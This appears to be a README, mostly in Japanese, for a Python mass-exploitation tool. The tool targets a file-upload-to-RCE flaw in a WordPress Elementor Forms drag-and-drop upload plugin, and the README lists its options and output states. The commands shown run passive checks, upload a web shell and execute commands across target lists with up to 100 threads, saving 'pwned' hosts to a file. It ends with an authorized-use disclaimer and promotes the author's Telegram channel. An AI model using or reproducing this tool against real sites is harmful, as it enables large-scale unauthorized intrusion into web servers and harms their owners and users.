
CVE-2026-18351 用の一括エクスプロイトツール。Elementor Forms <= 1.6.0 における認証不要の任意ファイルアップロードから RCE に至る脆弱性を悪用し、パッシブプロービング、シェルアップロード、コマンド実行を備える。
CVE-2026-18351 の大量エクスプロイトツール — Drag and Drop File Upload for Elementor Forms <= 1.6.0 における未認証の任意ファイルアップロード → RCE。
credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect
外部依存関係なし — Python 標準ライブラリのみを使用。
python3 --version # 3.6+
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check
# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id
# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami
# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check
# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id
# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Save full log
python3 mass.py --list targets.txt --output results.txt
# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Combined output
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Option | Description |
|---|---|
--url | 単一ターゲット URL |
--list FILE | ターゲット URL を含むファイル(1 行に 1 つ) |
--check | パッシブプローブのみ — ファイルアップロードなし |
--cmd CMD | シェルで実行するコマンド(デフォルト: id) |
--threads N | 同時スレッド数(デフォルト: 20) |
--timeout N | リクエストごとのタイムアウト秒数(デフォルト: 10) |
--output FILE | 完全ログをファイルに保存 |
--output-vuln FILE | 脆弱なターゲット URL のみをファイルに保存 |
--output-pwned FILE | RCE が確認されたターゲットのみをファイルに保存 |
| State | Meaning |
|---|---|
PWNED | シェルがアップロードされ、RCE が確認された |
VULN-NO-EXEC | アップロードは受け入れられたが、シェル実行に失敗した |
PATCHED | アップロードが拒否された、または nonce が見つからなかった |
ERROR | ネットワークまたはパースの失敗 |
1 行に 1 つの URL。# で始まる行は無視されます。
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
このプロジェクトは、許可されたセキュリティ評価、防御的セキュリティ研究、および脆弱性検証のためにのみ提供されています。
本ソフトウェアを使用することにより、対象システムを評価する明示的な許可を有していることを確認するものとします。コンピュータシステムへの不正アクセスは禁止されており、適用される法律に違反する可能性があります。
著者および貢献者は、本プロジェクトの不正使用を推奨または容認せず、その使用から生じるいかなる誤用、損害、または法的結果についても責任や義務を負いません。
JohenLastGen — JLG NETWORK